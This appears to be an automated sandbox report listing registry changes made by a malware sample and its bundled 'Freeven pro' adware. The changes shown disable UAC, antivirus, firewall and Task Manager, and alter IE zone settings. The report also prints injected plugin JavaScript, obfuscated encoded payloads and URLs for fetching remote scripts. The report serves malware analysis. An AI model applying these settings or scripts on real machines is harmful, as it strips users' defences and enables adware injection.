[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"DisplayName" = "Freeven pro"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppPath" = "%Program Files%\Freeven pro"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"DisplayIcon" = "%Program Files%\Freeven pro\utils.exe"
"Publisher" = "Freeven"
[HKLM\SOFTWARE\Freeven pro\Installer]
"BundledIe" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppName" = "Freeven pro-bg.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppPath" = "%Program Files%\Freeven pro"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"CrAppId" = "54248"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppName" = "Freeven pro-codedownloader.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 1E 98 3B FA 27 D3 5F E6 DB 60 96 9F D9 33 E6"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"Policy" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppName" = "Freeven pro-codedownloader.exe"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppPath" = "%Program Files%\Freeven pro"
[HKLM\SOFTWARE\Freeven pro\Installer]
"BundledChrome" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1860 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Aas]
"a1_0" = "3432392762"
[HKCU\Software\Aas\695404737]
"35845605" = "476"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Aas\695404737]
"50183847" = "83AD022F944CCF21DDECD41871254667172BA39F3E949513F4CC29B07060AC534912E5BCB155880C2C4326E6FB83E6FA099D4219F6885291D527824C5507229614A07CE2AF035D97263FF7F26AD2ACC9D5D4395D4B8B3109DC5C0C87B31A1505E6E94E08EF20E71B91B96D3856F531DADFD78A894AD6A6C177136C5657B01661"
"43014726" = "0C00687474703A2F2F7777772E6C656479617A696C696D2E636F6D2F6C6F676F2E67696600687474703A2F2F6B73616E64726166617368696F6E2E636F6D2F6C6F676F2E67696600687474703A2F2F7777772E6C6166796572692E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6B756C7070617375722E636F6D2F6C6F676F2E67696600687474703A2F2F746F616C6C616465706170656C2E636F6D2E61722F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E65636F6C652D7361696E742D73696D6F6E2E6E65742F696E6465785F746F702F6C6F676F2E67696600687474703A2F2F6C617A617265612E726F2F696D616765732F6C6F676F2E67696600687474703A2F2F6B6F6F6E6164616E6365322E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6B75706C752E62656C2E74722F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E6C69646572616E636173706F6C6974696361732E636F6D2E62722F6C6F676F2E67696600687474703A2F2F7777772E6C6567616C62696C676973617961722E636F6D2F696D672F6C6F676F2E67696600687474703A2F2F6C696665636F6D32342E636F2E63632F696D616765732F6C6F676F2E676966"
[HKCU\Software\Aas]
"a3_0" = "17001001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "144"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKCU\Software\Aas\695404737]
"21507363" = "0"
"28676484" = "35"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A FD FA BB EA 61 DD 80 E7 D5 ED 3C F1 85 44 26"
[HKCU\Software\Aas]
"a2_0" = "5517"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Aas]
"a4_0" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"
Task Manager is disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"
The process 875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe:1180 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 39 13 D7 37 B7 61 90 FA 78 35 BD F7 FF B6 0D"
The process 875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe:508 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 8F CB F6 60 FA 98 AE 6F 69 75 B0 95 35 D0 20"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process WINMINE.EXE:1048 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 B5 46 A7 6F AF E2 6A 7E 95 1F 16 75 E6 3D 2B"
The process WINMINE.EXE:3776 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A E2 E1 83 7B 44 76 38 04 07 94 2A 66 5B 7E 80"
The process WINMINE.EXE:544 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 45 2D DF A8 89 E0 A3 8C 14 F3 A9 D5 80 FF AC"
The process Freeven pro-codedownloader.exe:2144 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Freeven pro\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se6"
[HKCU\Software\Freeven pro\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\Freeven pro\Plugins\390]
"Version" = "1"
[HKCU\Software\Freeven pro\Plugins\39]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\Freeven pro\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmIya6"
[HKCU\Software\Freeven pro\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\Freeven pro\Plugins\78]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/78.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Freeven pro\Plugins\14]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/14.js"
[HKCU\Software\Freeven pro\Plugins\288]
"Name" = "firstoffer_pricecomp_m"
[HKCU\Software\Freeven pro\Plugins\2]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/2.js"
[HKCU\Software\Freeven pro\Plugins\40]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\102]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/102.js"
[HKCU\Software\Freeven pro\Plugins\345]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/345.js"
[HKCU\Software\Freeven pro\Manifest]
"Manifest" = "NA"
[HKCU\Software\Freeven pro\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi6"
[HKCU\Software\Freeven pro\Plugins\47]
"Version" = "3"
[HKCU\Software\Freeven pro\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\Freeven pro\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) { if (appAPI.internal.monetization.getCampaignId() == 0) { appAPI.internal.monetization.loader.setCampaignId(1026); } }};"
[HKCU\Software\Freeven pro\Plugins\36]
"Name" = "IEBackground"
[HKCU\Software\Freeven pro\Plugins\345]
"Name" = "pluginsVerticals"
[HKCU\Software\Freeven pro\Manifest]
"PublisherName" = "Freeven"
[HKCU\Software\Freeven pro\Plugins\354]
"Version" = "2"
[HKCU\Software\Freeven pro\Plugins\45]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\180]
"Version" = "12"
[HKCU\Software\Freeven pro\Plugins\380]
"Name" = "callcenter_j_m"
[HKCU\Software\Freeven pro\Plugins\334]
"Name" = "sharonl_ws_m"
[HKCU\Software\Freeven pro\Plugins\376]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/376.js"
[HKCU\Software\Freeven pro\Plugins\273]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/273.js"
[HKCU\Software\Freeven pro\Plugins\288]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/288.js"
[HKCU\Software\Freeven pro\Manifest]
"Version" = "111"
[HKCU\Software\Freeven pro\Plugins\9]
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\273]
"Name" = "aedgency_back_button_m"
[HKCU\Software\Freeven pro\Plugins\180]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/180.js"
[HKCU\Software\Freeven pro\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\Freeven pro\Manifest]
"Description" = "Feven Shopping Companion"
[HKCU\Software\Freeven pro\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\Freeven pro\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\Freeven pro\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\Freeven pro\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\Freeven pro\Plugins\230]
"Version" = "7"
[HKCU\Software\Freeven pro\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n6"
[HKCU\Software\Freeven pro\Plugins\64]
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\180]
"Name" = "bpo_serp_m"
[HKCU\Software\Freeven pro\Plugins\200]
"Name" = "foxydeal_m"
[HKCU\Software\Freeven pro\Plugins\41]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/41.js"
[HKCU\Software\Freeven pro\Plugins\43]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/43.js"
[HKCU\Software\Freeven pro\Plugins\7]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve6"
[HKCU\Software\Freeven pro\Plugins\220]
"Version" = "38"
[HKCU\Software\Freeven pro\Plugins\195]
"Version" = "28"
[HKCU\Software\Freeven pro\Manifest]
"RunInFrame" = "false"
"ChangePrevious" = "false"
[HKCU\Software\Freeven pro\Plugins\253]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/253.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Freeven pro\Plugins\45]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/45.js"
[HKCU\Software\Freeven pro\Plugins\94]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/94.js"
[HKCU\Software\Freeven pro\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Freeven pro\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\Freeven pro\Manifest]
"EnableSearchIE" = "false"
[HKCU\Software\Freeven pro\Plugins\391]
"Version" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Freeven pro\Plugins\17]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\193]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/193.js"
[HKCU\Software\Freeven pro\Plugins\78]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\246]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/246.js"
[HKCU\Software\Freeven pro\Plugins\345]
"JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390],intext:[103,117,123,142,259,263,342,359,360,391],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389]};"
[HKCU\Software\Freeven pro\Plugins\4]
"URL" = "http://js.ourstatsstaticstack.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\Freeven pro\Plugins\260]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\281]
"Version" = "3"
[HKCU\Software\Freeven pro\Debug]
"IsDebuggingPlugins" = "0"
[HKCU\Software\Freeven pro\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\Freeven pro\Plugins\260]
"Name" = "pricedetect_sidebar_m"
[HKCU\Software\Freeven pro\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKCU\Software\Freeven pro\Plugins\13]
"Version" = "7"
[HKCU\Software\Freeven pro\Manifest]
"homepageurl" = "NA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Freeven pro\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,345,354,253,102,180,184,193,220,195,200,221,223,230,233,242,260,273,281,288,334,375,380,390,391,91"
[HKCU\Software\Freeven pro\Plugins\390]
"Name" = "50pops_new_m"
[HKCU\Software\Freeven pro\Plugins\391]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk0YjAwMWYwMTE3MmQxYTFlNTM1ODRiMDAxZjAxMTc0MjQ3NWQxMjA2MDcwYjBhMTYwZjFkNDUxMzVmMDMwMjA5MDYxNDBlMTAwYzVjMWYwNzFkNDcxODAwMDU1NzAwNDI0ODVhNWIwYTBlNWEzODI3MmIyMDNlMzEzYTNhMjIzMTIyMmEzNzM3MjkzNjJjMjYyZjMwMjMyNzNiMjczMzNkMjAyYzM0MmE0ODE0NDYxODAyNWQxOTAxMGY0ODU1NGE1MTQ2NTcwNzExMWM1NjJhMzgzYjNhM2QyMjMxM2IyMTJmMzAzNTI3MjkyMjIxM2QyNzI5MjYzMDM4Mjc0YTVlNTMwYTFkMWMxYjA2MzIwYTA0NTA0YjQwMDExYzFmMDUxNDQyNDc1ZDEyMDYwNzBiMGExNjBmMWQ0NTEzNWYwMzAyMDkwNjE0MGUxMDBjNWMxZjA3MWQ0NzE4MDAwNTU3MDA0MjQ4NWE1YjBhMGU1YTM4MjcyYjIwM2UzMTNhM2EyMjMxMjIyYTM3MzcyOTM2MmMyNjJmMzAyMzI3M2IyNzMzM2QyMDJjMzQyYTQ4MTQ0NjE4MDI1ZDE5MDEwZjQ4NTU0YTUxNDY1NzA3MTExYzU2MmEzODNiM2EzZDIyMzEzYjIxMmYzMDM1MjcyOTIyMjEzZDI3MjkyNjMwMzgyNzRhNWU1MzEyMDUxZDBjMWMwOTMxMGM1MDRiNTE1MDU5MTY=', 'bihkugxhrq'); }"
[HKCU\Software\Freeven pro\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\Freeven pro\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\Freeven pro\Plugins\91]
"Version" = "135"
[HKCU\Software\Freeven pro\Plugins\260]
